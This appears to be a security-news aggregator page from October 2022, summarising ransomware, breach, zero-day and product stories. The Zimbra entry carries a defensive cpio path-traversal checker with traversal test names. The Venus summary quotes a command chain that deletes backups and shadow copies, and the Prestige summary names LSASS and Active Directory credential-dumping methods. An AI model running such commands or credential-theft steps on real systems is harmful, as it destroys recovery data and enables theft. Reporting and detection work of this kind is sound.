
                Expel extends its reach in EMEA to address critical cybersecurity needs

                ciber
                2022-10-18 https://www.helpnetsecurity.com/2022/10/19/expel-emea/

                Expel has expanded to support the cybersecurity needs of customers in EMEA, and is now operating in the United Kingdom (UK), Ireland, Sweden and the Netherlands. Expel hired cybersecurity industry veteran Chris Waynforth as the general manager and vice president of international business. Waynforth is responsible for growing Expel’s presence in EMEA, supporting customers, and building relationships with EMEA channel partners. “We’re fortunate that Expel’s reputation has preceded us formally entering the market, as we … More

                The post Expel extends its reach in EMEA to address critical cybersecurity needs appeared first on Help Net Security.

                Autosummary: This unmatched transparency means customers always know what’s happening in their investigations into incidents like business email compromise (BEC), business application compromise (BAC), phishing, ransomware, cryptojacking, and supply chain attacks, to name a few.


                Security stack consolidation helps CISOs lower cybersecurity spending

                ciber
                2022-10-17 https://www.helpnetsecurity.com/2022/10/17/security-stack-consolidation-video/

                In this Help Net Security video, Alfredo Hickman, Head of Information Security at Obsidian Security, discusses the importance of security stack consolidation for organizations looking to reduce security costs while increasing security efficiency and effectiveness.

                The post Security stack consolidation helps CISOs lower cybersecurity spending appeared first on Help Net Security.

                Autosummary:


                AwareGO Employee Cybersecurity Risk Audit identifies weak points associated with human risk

                ciber
                2022-10-17 https://www.helpnetsecurity.com/2022/10/17/awarego-employee-cybersecurity-risk-audit/

                AwareGO launched full Employee Cybersecurity Risk Audit and consultation to help organizations identify critical cybersecurity risks among employees. “Today, around 90% of all successful cybersecurity attacks involve employees enabling the break-in. It is therefore critical for anyone responsible for an organization’s cybersecurity to have a clear picture of what employees know and how they behave in the face of potential threats. Only then is it possible to effectively respond with training or other risk-reducing approaches.” … More

                The post AwareGO Employee Cybersecurity Risk Audit identifies weak points associated with human risk appeared first on Help Net Security.

                Autosummary:


                Economic uncertainty is increasing cybersecurity risks

                ciber
                2022-10-17 https://www.helpnetsecurity.com/2022/10/17/economic-uncertainty-increasing-cybersecurity-risks/

                Cybercriminals are always seeking to make their attacks, scams and campaigns as effective as possible. This includes harnessing whatever is dominating the news agenda and is on their victims’ mind. Economic uncertainty and cybersecurity risks The current economic uncertainty and cost of living pressures that many consumers are facing around the world is one example. The stress, fear and concern the public is feeling is unfortunately a perfect scenario for cybercriminals to take advantage. Case … More

                The post Economic uncertainty is increasing cybersecurity risks appeared first on Help Net Security.

                Autosummary: That’s not even factoring in the broader array of IT assets in place, from cloud services and software, to workstations, personal mobile devices, users and more. Businesses must walk the line carefully between removing the bloat and nice-to-haves, and hamstringing their cybersecurity capability, otherwise leaders could find themselves paying much, much more.


                Zimbra Releases Patch for Actively Exploited Vulnerability in its Collaboration Suite

                exploits
                2022-10-17 https://thehackernews.com/2022/10/zimbra-releases-patch-for-actively.html
                Zimbra has released patches to contain an actively exploited security flaw in its enterprise collaboration suite that could be leveraged to upload arbitrary files to vulnerable instances. Tracked as CVE-2022-41352 (CVSS score: 9.8), the issue affects a component of the Zimbra suite called Amavis, an open source content filter, and more specifically, the cpio utility it uses to scan and extract

                Autosummary:
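                The entry above describes CVE-2022-41352 as a flaw in the cpio utility that Amavis uses to extract mail attachments, and says it lets an attacker upload arbitrary files to the server. The defensive check a practitioner wants for that class of bug is a pre-extraction scan of the archive's entry names. The Python below is an added example, not Zimbra's, Amavis's, or Rapid7's code: it parses the SVR4 "newc" cpio format and flags every entry whose name would escape the directory it is extracted into (absolute paths, or paths that normalise to something under `..`). The archive is constructed inline and its entry names and contents are made up; that "escapes the extraction directory" is the property worth flagging is the assumption the example rests on.

```python
import posixpath
from typing import Iterator, List, Tuple

# SVR4 "newc" cpio: a 110-byte ASCII header per entry (6-byte magic plus
# thirteen 8-digit hex fields), then the NUL-terminated name, then the data,
# each padded to a 4-byte boundary, ending with an entry named "TRAILER!!!".
NEWC_MAGIC = b"070701"
HEADER_LEN = 110
TRAILER = "TRAILER!!!"


def _pad4(n: int) -> int:
    """Bytes needed to round n up to a multiple of 4."""
    return (4 - n % 4) % 4


def build_newc(entries: List[Tuple[str, bytes]]) -> bytes:
    """Build a minimal newc archive of regular files (constructed test input only)."""
    out = bytearray()
    for ino, (name, data) in enumerate(entries + [(TRAILER, b"")], start=1):
        name_b = name.encode() + b"\0"
        # ino, mode, uid, gid, nlink, mtime, filesize, devmajor, devminor,
        # rdevmajor, rdevminor, namesize, check
        fields = [ino, 0o100644, 0, 0, 1, 0, len(data), 0, 0, 0, 0, len(name_b), 0]
        out += NEWC_MAGIC + b"".join(b"%08x" % f for f in fields)
        out += name_b + b"\0" * _pad4(HEADER_LEN + len(name_b))
        out += data + b"\0" * _pad4(len(data))
    return bytes(out)


def iter_newc(archive: bytes) -> Iterator[Tuple[str, bytes]]:
    """Yield (name, data) per entry; stop at the trailer; reject bad or truncated input."""
    off = 0
    while off + HEADER_LEN <= len(archive):
        hdr = archive[off:off + HEADER_LEN]
        if hdr[:6] != NEWC_MAGIC:
            raise ValueError(f"bad newc magic at offset {off}")
        fields = [int(hdr[6 + 8 * i:14 + 8 * i], 16) for i in range(13)]
        filesize, namesize = fields[6], fields[11]
        name_start = off + HEADER_LEN
        name = archive[name_start:name_start + namesize - 1].decode("utf-8", "replace")
        if name == TRAILER:
            return
        data_start = name_start + namesize + _pad4(HEADER_LEN + namesize)
        if data_start + filesize > len(archive):
            raise ValueError(f"truncated entry {name!r}")
        yield name, archive[data_start:data_start + filesize]
        off = data_start + filesize + _pad4(filesize)
    raise ValueError("archive ended without a trailer")


def is_unsafe_path(name: str) -> bool:
    """True if extracting `name` under a directory could write outside that directory."""
    if name.startswith("/"):
        return True
    norm = posixpath.normpath(name)
    return norm == ".." or norm.startswith("../")


def find_unsafe_entries(archive: bytes) -> List[str]:
    """Names of entries an extractor that honours archive paths would misplace."""
    return [name for name, _ in iter_newc(archive) if is_unsafe_path(name)]


# Constructed archive (hypothetical names): one benign attachment, one
# traversal, one absolute path, one "dir/../" that normalises back inside.
SAMPLE_ARCHIVE = build_newc([
    ("attachment.txt", b"hello"),
    ("../../../tmp/dropped.jsp", b"<% out.println(1); %>"),
    ("/etc/cron.d/job", b"* * * * * root id\n"),
    ("dir/../safe.txt", b"ok"),
])

if __name__ == "__main__":
    for entry_name, entry_data in iter_newc(SAMPLE_ARCHIVE):
        verdict = "UNSAFE" if is_unsafe_path(entry_name) else "ok"
        print(f"{verdict:6} {entry_name} ({len(entry_data)} bytes)")
```

                The scan is deliberately done on the names only, before anything is written to disk; a content filter that extracts first and checks afterwards has already lost. `dir/../safe.txt` is kept because it normalises to a path inside the target directory, which is why the check normalises rather than simply searching for `..`.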


                Ransomware attack halts circulation of some German newspapers

                exploits
                2022-10-17 https://www.bleepingcomputer.com/news/security/ransomware-attack-halts-circulation-of-some-german-newspapers/
                German newspaper "Heilbronn Stimme" published today's 28-page issue in e-paper form after a Friday ransomware attack crippled its printing systems. [...]

                Autosummary: Today's issue in e-paper form. Editor-in-chief Uwe Ralf Heer said that the attack impacted the entire Stimme Mediengruppe media group, which includes the companies ‘Pressedruck’, ‘Echo’, and ‘RegioMail.’


                Fine for Shein! Fashion site hit with $1.9 million bill after lying about data breach

                financial
                2022-10-17 https://www.bitdefender.com/blog/hotforsecurity/fine-for-shein-fashion-site-hit-with-1-9-million-bill-after-lying-about-data-breach/
                The parent company of women's fashion site Shein has been fined $1.9 million after being accused of lying about the extent of data breach, and notifying "only a fraction" of affected customers. Read more in my article on the Hot for Security blog.

                Autosummary: Zoetop had been ordered to maintain a comprehensive information security program that includes more robust hashing of customer passwords, network monitoring for suspicious activity, network vulnerability scanning, and incident response policies requiring timely investigation, timely consumer notice, and prompt password resets.


                Black Basta Ransomware Hackers Infiltrate Networks via Qakbot to Deploy Brute Ratel C4

                exploits ransomware
                2022-10-17 https://thehackernews.com/2022/10/black-basta-ransomware-hackers.html
                The threat actors behind the Black Basta ransomware family have been observed using the Qakbot trojan to deploy the Brute Ratel C4 framework as a second-stage payload in recent attacks. The development marks the first time the nascent adversary simulation software is being delivered via a Qakbot infection, cybersecurity firm Trend Micro said in a technical analysis released last week. The

                Autosummary: According to Trend Micro, the ZIP file in the email contains an ISO file, which, in turn, includes a LNK file that fetches the Qakbot payload, illustrating attempts on part of threat actors to adapt to other tactics in the aftermath of Microsoft's decision to block macros by default for documents downloaded from the web.


                New Prestige Ransomware Targeting Polish and Ukrainian Organizations

                exploits ransomware
                2022-10-17 https://thehackernews.com/2022/10/new-prestige-ransomware-targeting.html
                A new ransomware campaign targeted the transportation and logistics sectors in Ukraine and Poland on October 11 with a previously unknown payload dubbed Prestige. "The activity shares victimology with recent Russian state-aligned activity, specifically on affected geographies and countries, and overlaps with previous victims of the FoxBlade malware (also known as HermeticWiper)," the Microsoft

                Autosummary: It's suspected that "Ransom Cartel operators had access to earlier versions of REvil ransomware source code," Palo Alto Networks Unit 42 observed on October 14, stating that "there was a relationship between the groups at some point, though it may not have been recent." REvil, earlier this January, suffered further setback when Russian authorities arrested multiple members, but there are indications that the notorious cybercrime cartel may have staged a return in some form.


                Japanese tech firm Oomiya hit by LockBit 3.0. Multiple supply chains potentially impacted

                ransomware
                2022-10-17 https://securityaffairs.co/wordpress/137243/cyber-crime/oomiya-lockbit-3-0-ransomware.html

                The IT infrastructure of the Japanese tech company Oomiya was infected with the LockBit 3.0 ransomware. One of the affiliates for the LockBit 3.0 RaaS hit the Japanese tech company Oomiya. Oomiya is focused on designing and manufacturing microelectronics and facility system equipment. The business of Omiya Kasei is divided into four major areas, manufacturing and designing […]

                The post Japanese tech firm Oomiya hit by LockBit 3.0. Multiple supply chains potentially impacted appeared first on Security Affairs.

                Autosummary:


                Windows Mark of the Web bypass zero-day gets unofficial patch

                exploits
                2022-10-17 https://www.bleepingcomputer.com/news/microsoft/windows-mark-of-the-web-bypass-zero-day-gets-unofficial-patch/
                A free unofficial patch has been released through the 0patch platform to address an actively exploited zero-day flaw in the Windows Mark of the Web (MotW) security mechanism. [...]

                Autosummary: Without trying too hard, here I've got a ZIP file where the contents retain NO protection from Mark of the Web. pic.twitter.com/1SOuzfca5q — Will Dormann (@wdormann) July 5, 2022. As ACROS Security CEO and co-founder of the 0patch micropatching service Mitja Kolsek explains, MotW is an essential Windows security mechanism since Smart App Control will only work on files with MotW flags and Microsoft Office will only block macros on documents tagged with MotW labels.


                Australian insurance firm Medibank confirms ransomware attack

                financial exploits ransomware
                2022-10-17 https://www.bleepingcomputer.com/news/security/australian-insurance-firm-medibank-confirms-ransomware-attack/
                Health insurance provider Medibank has confirmed that a ransomware attack is responsible for last week's cyberattack and disruption of online services. [...]

                Autosummary: The company first detected unusual activity on its network on Wednesday, October 12, and immediately shut down parts of its systems, including customer-facing services, to reduce the chances of data loss.


                Retail giant Woolworths discloses data breach of MyDeal online marketplace

                financial
                2022-10-17 https://securityaffairs.co/wordpress/137262/data-breach/woolworths-data-breach.html

                Australian retail giant Woolworths disclosed a data breach that impacted approximately 2.2 million MyDeal customers. Bad news for the customers of the MyDeal online marketplace, the Australian retail giant Woolworths disclosed a data breach that impacted approximately 2.2 million of them. As soon as the company became aware of the security breach it blocked access to […]

                The post Retail giant Woolworths discloses data breach of MyDeal online marketplace appeared first on Security Affairs.

                Autosummary:


                Malware dev claims to sell new BlackLotus Windows UEFI bootkit

                exploits
                2022-10-17 https://www.bleepingcomputer.com/news/security/malware-dev-claims-to-sell-new-blacklotus-windows-uefi-bootkit/
                A threat actor is selling on hacking forums what they claim to be a new UEFI bootkit named BlackLotus, a malicious tool with capabilities usually linked to state-backed threat groups. [...]

                Autosummary: "Considering this tradecraft used to be relegated to APTs like the Russian GRU and APT 41 (China nexus), and considering prior criminal discoveries we've made (e.g. Trickbot's Trickboot module), this represents a bit of a "leap" forward, in terms of ease of use, scalability, accessibility and most importantly, the potential for much more impact in the forms of persistence, evasion and/or destruction."


                MyDeal data breach impacts 2.2M users, stolen data for sale online

                financial
                2022-10-17 https://www.bleepingcomputer.com/news/security/mydeal-data-breach-impacts-22m-users-stolen-data-for-sale-online/
                Woolworths' MyDeal subsidiary has disclosed a data breach affecting 2.2 million customers, with the hacker trying to sell the stolen data on a hacker forum. [...]

                Autosummary:


                5 steps to protect your school from cyberattacks

                ciber
                2022-10-17 https://www.welivesecurity.com/2022/10/17/5-steps-protect-school-cyberattacks/

                What can schools, which all too often make easy prey for cybercriminals, do to bolster their defenses and keep threats at bay?

                The post 5 steps to protect your school from cyberattacks appeared first on WeLiveSecurity

                Autosummary: Make sure that, over time, your staff understands the importance of not sharing equipment, of keeping passwords private, and of not publishing pictures that might identify sensitive information – and that they can recognize basic features of phishing email. Have a dedicated IT specialist: To understand whether all the devices you listed are working properly or need to be updated, you need an IT person, or an IT team, depending on the size of your school. For schools that went online, new challenges arose over privacy concerns, data leaks, and hacks.


                Rockwell Automation FactoryTalk Design Hub improves development of automation projects

                industry
                2022-10-16 https://www.helpnetsecurity.com/2022/10/16/rockwell-automation-factorytalk-design-hub/

                Rockwell Automation released FactoryTalk Design Hub, enabling industrial organizations to transform their automation design capabilities with a more simplified, productive way to work powered by the cloud. Teams of all sizes, skillsets, and locations can work smarter through enhanced collaboration, improved lifecycle management, and on-demand access to cloud-based software. The result is increased design productivity, faster time to market, and systems that cost less to build and maintain. “In this new age of ‘work from … More

                The post Rockwell Automation FactoryTalk Design Hub improves development of automation projects appeared first on Help Net Security.

                Autosummary: “Rockwell Automation’s FactoryTalk Design Hub enables seamless digital thread connectivity between its design, visualization, digital twin, storage, and remote access software tools that provide control system developers with immediate on-demand access to all automation designs as needed regardless of their location, helping these companies to accelerate their initiatives ranging from digital transformation to IT/OT convergence,” Resnick added. “The digital transformation of automation design capabilities requires both the cloud to maximize control system developers’ productivity, and it also requires that all software tools are connected to each other by a digital thread to maximize collaboration, scalability, and productivity,” according to Craig Resnick, vice president, ARC Advisory Group.


                New PHP information-stealing malware targets Facebook accounts

                exploits
                2022-10-16 https://www.bleepingcomputer.com/news/security/new-php-information-stealing-malware-targets-facebook-accounts/
                Threat analysts have spotted a new Ducktail campaign using a new infostealer variant and novel TTPs (tactics, techniques, and procedures), while the Facebook users it targets are no longer limited to holders of business accounts. [...]

                Autosummary: Still, if the account type is determined to be a business account, the malware will attempt to fetch additional information about payment methods, cycles, amounts spent, owner details, verification status, owned pages, PayPal address, and more.


                Threat actors hacked hundreds of servers by exploiting Zimbra CVE-2022-41352 bug

                exploits
                2022-10-16 https://securityaffairs.co/wordpress/137164/apt/zimbra-cve-2022-41352-exploitation.html

                Threat actors have compromised hundreds of servers exploiting critical flaw CVE-2022-41352 in Zimbra Collaboration Suite (ZCS). Last week, researchers from Rapid7 warned of the exploitation of unpatched zero-day remote code execution vulnerability, tracked as CVE-2022-41352, in the Zimbra Collaboration Suite. Rapid7 has published technical details, including a proof-of-concept (PoC) code and indicators of compromise (IoCs) regarding […]

                The post Threat actors hacked hundreds of servers by exploiting Zimbra CVE-2022-41352 bug appeared first on Security Affairs.

                Autosummary: #volexintel 1/4 — Volexity (@Volexity) October 13, 2022. Some webshell paths that @Volexity identified were used in targeted (likely #APT) exploitation of key organizations in government, telecommunications, and IT, predominantly in Asia; others were used in massive worldwide #exploitation. Rapid7 has published technical details, including a proof-of-concept (PoC) code and indicators of compromise (IoCs) regarding CVE-2022-41352 on AttackerKB.


                Mysterious Prestige ransomware targets organizations in Ukraine and Poland

                exploits ransomware
                2022-10-16 https://securityaffairs.co/wordpress/137203/apt/prestige-ransomware-targets-ukraine.html

                Microsoft warns that new Prestige ransomware is targeting transportation and logistics organizations in Ukraine and Poland. Microsoft reported that new Prestige ransomware is being used in attacks aimed at transportation and logistics organizations in Ukraine and Poland. The Prestige ransomware first appeared in the threat landscape on October 11 in attacks occurring within an hour […]

                The post Mysterious Prestige ransomware targets organizations in Ukraine and Poland appeared first on Security Affairs.

                Autosummary: Before deploying ransomware in the target networks, the threat actors were observed using the following two remote execution utilities:

                RemoteExec – a commercially available tool for agentless remote code execution
                Impacket WMIexec – an open-source script-based solution for remote code execution

                Then DEV-0960 used the following tools in some attacks to access highly privileged credentials:

                winPEAS – an open-source collection of scripts to perform privilege escalation on Windows
                comsvcs.dll – used to dump the memory of the LSASS process and steal credentials
                ntdsutil.exe – used to back up the Active Directory database, likely to extract credentials from it later

                “In all observed deployments, the attacker had already gained access to highly privileged credentials, like Domain Admin, to facilitate the ransomware deployment,” the report continues.


                Venus Ransomware targets publicly exposed Remote Desktop services

                exploits ransomware
                2022-10-16 https://www.bleepingcomputer.com/news/security/venus-ransomware-targets-publicly-exposed-remote-desktop-services/
                Threat actors behind the relatively new Venus Ransomware are hacking into publicly-exposed Remote Desktop services to encrypt Windows devices. [...]

                Autosummary: Processes the ransomware targets (list as published, duplicates included): taskkill, msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, mydesktopqos.exe, agntsvc.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, sqlservr.exe, thebat64.exe, thunderbird.exe, winword.exe, wordpad.exe

                The ransomware also deletes event logs, and it deletes the backup catalog and Volume Shadow Copies and disables Data Execution Prevention (DEP) with the following command:

                wbadmin delete catalog -quiet && vssadmin.exe delete shadows /all /quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE

                When encrypting files, the ransomware will append the .venus extension, as shown below.


                Indian Energy Company Tata Power's IT Infrastructure Hit By Cyber Attack

                industry
                2022-10-15 https://thehackernews.com/2022/10/indian-energy-company-tata-powers-it.html
                Tata Power Company Limited, India's largest integrated power company, on Friday confirmed it was targeted by a cyberattack. The intrusion on IT infrastructure impacted "some of its IT systems," the company said in a filing with the National Stock Exchange (NSE) of India. It further said it has taken steps to retrieve and restore the affected machines, adding it put in place

                Autosummary:


                Fortinet urges admins to patch bug with public exploit immediately

                exploits
                2022-10-15 https://www.bleepingcomputer.com/news/security/fortinet-urges-admins-to-patch-bug-with-public-exploit-immediately/
                Fortinet urges customers to urgently patch their appliances against a critical authentication bypass vulnerability in FortiOS, FortiProxy, and FortiSwitchManager that is being exploited in attacks. [...]

                Autosummary:


                Almost 900 servers hacked using Zimbra zero-day flaw

                exploits
                2022-10-15 https://www.bleepingcomputer.com/news/security/almost-900-servers-hacked-using-zimbra-zero-day-flaw/
                Almost 900 servers have been hacked using a critical Zimbra Collaboration Suite (ZCS) vulnerability, which at the time was a zero-day without a patch for nearly 1.5 months. [...]

                Autosummary: On the same day, a proof of concept (PoC) was added to the Metasploit framework, enabling even low-skilled hackers to launch effective attacks against vulnerable servers.


                Smart buildings may be your cybersecurity downfall

                ciber
                2022-10-14 https://www.helpnetsecurity.com/2022/10/14/smart-buildings-cybersecurity/

According to a recent eEnergy report, 30 per cent of all purchased energy in the UK is currently wasted in commercial buildings, warehouses and education facilities. Whilst that's quite a shocking number, it is, unfortunately, no surprise, as the majority of existing buildings in UK cities were constructed without energy efficiency as a key priority. Many UK organizations have started taking decarbonisation goals much more seriously, but there is still a long way to go, …

Autosummary: The adoption of security solutions that integrate IT, OT, and IoT is essential for gaining a complete view of environments within building automation systems, as they provide continuous monitoring and guard against vulnerabilities, threats, and anomalies within the automation environment.


                Malwarebytes MDR enables organizations to prioritize critical alerts and detect advanced malware attacks

                exploits
                2022-10-14 https://www.helpnetsecurity.com/2022/10/14/malwarebytes-mdr/

Malwarebytes launched Malwarebytes Managed Detection and Response (MDR), which combines EDR technology and human-delivered security expertise to provide 24/7 threat hunting, monitoring, and response. Amid a shortage of skilled cybersecurity professionals, many organizations lack the time and expertise to monitor and validate security alerts around the clock. Teams also struggle to fully utilize the forensics and threat hunting tools provided by EDR platforms and can miss identifying hidden threats before they become infections. Without the time for …


                Tanium Benchmark allows IT teams to track the current state of endpoints

                government
                2022-10-14 https://www.helpnetsecurity.com/2022/10/14/tanium-benchmark/

Tanium launched Tanium Benchmark, a solution that delivers real-time, holistic assessments of the security and operational risks associated with connected endpoints, empowering teams to prioritize efforts, collaborate effectively, and take risk-mitigation action while reducing IT costs and complexity. Benchmark, powered by the Tanium XEM platform, determines real-time risk scores by analyzing up-to-date, comprehensive data from millions of endpoints across Tanium's global customer base. Benchmark compares a customer's endpoint metrics against their industry peers to establish …


                BAE Systems Viper MLV II reduces F-16 aircraft vulnerability to cyberattacks

                exploits ciber
                2022-10-14 https://www.helpnetsecurity.com/2022/10/14/bae-systems-viper-mlv-ii/

BAE Systems has released the Viper Memory Loader Verifier II (MLV II), a new version of a maintenance capability that will reduce vulnerability to cyberattacks for F-16 aircraft. "Our first generation Viper MLV has 20 years of proven reliability and durability in challenging flight line environments," said Carl Huncharek, F-16 product line director for BAE Systems. "This new version of the product will include cyber-hardened aircraft mission capabilities, with an open system architecture that reduces …


                PoC Exploit Released for Critical Fortinet Auth Bypass Bug Under Active Attacks

                exploits
                2022-10-14 https://thehackernews.com/2022/10/poc-exploit-released-for-critical.html
Proof-of-concept (PoC) exploit code has been made available for the recently disclosed critical security flaw affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager, making it imperative that users move quickly to apply the patches. "FortiOS exposes a management web portal that allows a user to configure the system," Horizon3.ai researcher James Horseman said. "Additionally, a user can


                Cybersecurity pros opine on the future of security

                ciber
                2022-10-14 https://www.helpnetsecurity.com/2022/10/14/future-of-security-video/

Trellix released global research revealing the cost of siloed security, weak spots in protection, and lack of confidence amongst security operations teams. This Help Net Security video uncovers how unsustainable the situation is for cybersecurity professionals today.


                Experts released PoC exploit code for critical bug CVE-2022-40684 in Fortinet products

                exploits
                2022-10-14 https://securityaffairs.co/wordpress/137095/hacking/fortinet-cve-2022-40684-poc.html

Experts released PoC exploit code for the authentication bypass flaw CVE-2022-40684 (CVSS score: 9.6) in FortiGate firewalls and FortiProxy web proxies. The vulnerability impacts FortiOS versions from 7.0.0 to 7.0.6 and from […]


                Australian police secret agents exposed in Colombian data leak

                latam
                2022-10-14 https://www.bleepingcomputer.com/news/security/australian-police-secret-agents-exposed-in-colombian-data-leak/
Identities of secret agents working for the Australian Federal Police (AFP) have been exposed after hackers leaked documents stolen from the Colombian government. [...]


                Researchers release PoC for Fortinet firewall flaw, exploitation attempts mount

                exploits
                2022-10-14 https://www.helpnetsecurity.com/2022/10/14/cve-2022-40684-exploitation/

Horizon3.ai researchers have released a PoC exploit for CVE-2022-40684, the authentication bypass vulnerability affecting Fortinet's firewalls and secure web gateways, and soon after exploitation attempts started rising. "[On Thursday], the Wordfence Threat Intelligence team began tracking exploit attempts targeting CVE-2022-40684 on our network of over 4 million protected websites," Wordfence threat analyst Ram Gall shared. They have recorded several exploit attempts and requests from over 20 IP addresses, but most of those were attempts to …


                New PHP Version of Ducktail Malware Hijacking Facebook Business Accounts

                exploits
                2022-10-14 https://thehackernews.com/2022/10/new-php-version-of-ducktail-malware.html
A PHP version of an information-stealing malware called Ducktail has been discovered in the wild being distributed in the form of cracked installers for legitimate apps and games, according to the latest findings from Zscaler. "Like older versions (.NetCore), the latest version (PHP) also aims to exfiltrate sensitive information related to saved browser credentials, Facebook account information,


                How To Build a Career as a Freelance Cybersecurity Analyst — From Scratch

                ciber
                2022-10-14 https://thehackernews.com/2022/10/how-to-build-career-as-freelance.html
With each passing year, the cybersecurity threat landscape continues to worsen. That reality makes cybersecurity analysts some of the most sought-after technology professionals in the world. And there are nowhere near enough of them to meet the demand. At last count, there were over 3.5 million unfilled cybersecurity jobs worldwide — and that number is still growing. The situation means that

Autosummary: Your goal is to emerge from these programs with a working knowledge of the following concepts: networking architecture and design; networking, routing and switching hardware and systems; firewalls and packet sniffing systems; threat detection and analysis methods; common network and software vulnerability types. Earn one or more cybersecurity certifications: the next thing you'll need to do is to earn one or more cybersecurity certifications to demonstrate your abilities to would-be employers. Prepare your freelance business: once you've got enough experience and have a solid resume of small freelance cybersecurity jobs under your belt, you'll be ready to turn your hard work into a standalone freelance business. Since you'll be marketing your skills and reputation as a cybersecurity analyst, the site doesn't need to be anything more than a professional-looking portal with your business name, basic information, and contact details. The takeaway: the sheer volume of open cybersecurity jobs, and the countless more that will appear in the next few years, make your odds of success as a freelance cybersecurity analyst quite high.


                Microsoft: New Prestige ransomware targets orgs in Ukraine, Poland

                exploits ransomware
                2022-10-14 https://www.bleepingcomputer.com/news/security/microsoft-new-prestige-ransomware-targets-orgs-in-ukraine-poland/
Microsoft says new Prestige ransomware is being used to target transportation and logistics organizations in Ukraine and Poland in ongoing attacks. [...]


                Researchers Reveal Detail for Windows Zero-Day Vulnerability Patched Last Month

                exploits
                2022-10-14 https://thehackernews.com/2022/10/researchers-reveal-detail-for-windows.html
Details have emerged about a now-patched security flaw in Windows Common Log File System (CLFS) that could be exploited by an attacker to gain elevated permissions on compromised machines. Tracked as CVE-2022-37969 (CVSS score: 7.8), the issue was addressed by Microsoft as part of its Patch Tuesday updates for September 2022, while also noting that it was being actively exploited in the wild.

Autosummary: "[Base record] contains the symbol tables that store information on the various client, container and security contexts associated with the Base Log File, as well as accounting information on these," according to Alex Ionescu, chief architect at Crowdstrike.


                The Week in Ransomware - October 14th 2022 - Bitcoin Trickery

                exploits ransomware
                2022-10-14 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-14th-2022-bitcoin-trickery/
This week's news is action-packed, with police tricking ransomware into releasing keys to victims calling ransomware operations liars. [...]

Autosummary: Contributors and those who provided new ransomware information and stories this week include: @struppigel, @VK_Intel, @serghei, @BleepinComputer, @billtoulas, @LawrenceAbrams, @malwareforme, @demonslay335, @FourOctets, @jorntvdw, @PolarToffee, @Ionut_Ilascu, @Seifreed, @fwosar, @malwrhunterteam, @DanielGallagher, @AuCyble, @UID_, @linuxct, @MsftSecIntel, @ahnlab, @Amermelsad, @TrendMicro, and @pcrisk. October 12th 2022: As previously shared, upon discovering the ransomware attack, we took immediate steps to protect our systems, contain the incident, begin an investigation, and ensure continuity of care.


                Police tricks DeadBolt ransomware out of 155 decryption keys

                exploits ransomware
                2022-10-14 https://www.bleepingcomputer.com/news/security/police-tricks-deadbolt-ransomware-out-of-155-decryption-keys/
The Dutch National Police, in collaboration with cybersecurity firm Responders.NU, tricked the DeadBolt ransomware gang into handing over 155 decryption keys by faking ransom payments. [...]

Autosummary: Heavy congestion combined with a low fee caused the Bitcoin blockchain to take much longer to confirm a transaction, allowing the police to make a transaction, receive the key, and immediately cancel their bitcoin transaction.


Zero-day flaws mean it's time to patch Exchange and Windows

                exploits
                2022-10-14 https://www.computerworld.com/article/3676636/zero-days-flaws-mean-its-time-to-patch-exchange-and-windows.html#tk.rss_security

This month's Patch Tuesday update from Microsoft deals with 84 flaws and a zero-day affecting Microsoft Exchange that at the moment remains unresolved. The Windows updates focus on Microsoft security and networking components with a difficult-to-test update to COM and OLE DB. And Microsoft browsers get 18 updates, nothing critical or urgent.

Autosummary: Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange; Microsoft Development platforms (ASP.NET Core, .NET [...]). More generally, given the broad nature of this update (Office and Windows), we suggest testing the following Windows features and components: A GDI update (GDIPLUS.DLL) requires testing of EMF, both 16- and 32-bit palette files (opening, printing, and creating). Unless otherwise specified, we should now assume each Patch Tuesday update will require testing core printing functions, including: printing from directly connected printers; large print jobs from servers (especially if they are also domain controllers); remote printing (using RDP and VPN). Key testing scenarios: given the large number of changes included this month, I have broken down the testing scenarios into high-risk and standard-risk groups. High Risk: For October, Microsoft has not recorded any high-risk functionality changes. Though all four vulnerabilities (CVE-2022-41032, CVE-2022-41032, CVE-2022-41034 and CVE-2022-41083) have standard entries in the Microsoft Security Update Guide (MSUG), the Visual Studio team has also published these 17.3 Release notes.


                Experts disclose technical details of now-patched CVE-2022-37969 Windows Zero-Day

                exploits
                2022-10-14 https://securityaffairs.co/wordpress/137119/hacking/cve-2022-37969-details.html

Researchers disclosed details of a now-patched flaw, tracked as CVE-2022-37969, in Windows Common Log File System (CLFS). The CVE-2022-37969 (CVSS score: 7.8) flaw is a Windows Common Log File System Driver Elevation of Privilege Vulnerability. The Common Log File System (CLFS) is a general-purpose logging subsystem that can be used by applications running in both kernel mode […]

Autosummary: "On September 2, 2022, Zscaler Threatlabz captured an in-the-wild 0-day exploit in the Windows Common Log File System Driver (CLFS.sys) and reported this discovery to Microsoft."



                Portnox unveils IoT fingerprinting and profiling solution to address rising IoT security threats

                industry
                2022-10-13 https://www.helpnetsecurity.com/2022/10/13/portnox-iot-security-solution/

Portnox released a cloud-native IoT security solution to help mid-market and enterprise businesses address rising Internet of Things (IoT) security threats. Now available via the Portnox Cloud, Portnox's new IoT fingerprinting and profiling capabilities empower organizations to identify, authenticate, authorize, and segment IoT devices across their network to ensure an effective zero trust security posture. "No organization is immune to the inherent and increasing number of security risks IoT devices pose as they are more …

Autosummary: Large enterprises are not alone when it comes to rising IoT security headaches; organizations of all sizes are actively trying to strengthen their security postures to account for the surge of threats tied to the rising operational dependence on IoT. With so many IoT devices (printers, cameras, thermostats, sensors, monitors, etc.) now in use across all types of organizations, the ability to automatically onboard and enforce IoT device authentication, control and security policies across the network is mission critical.


                Skybox Security introduces SaaS solution for Security Policy and Vulnerability Management

                exploits
                2022-10-13 https://www.helpnetsecurity.com/2022/10/13/skybox-security-saas-solution/

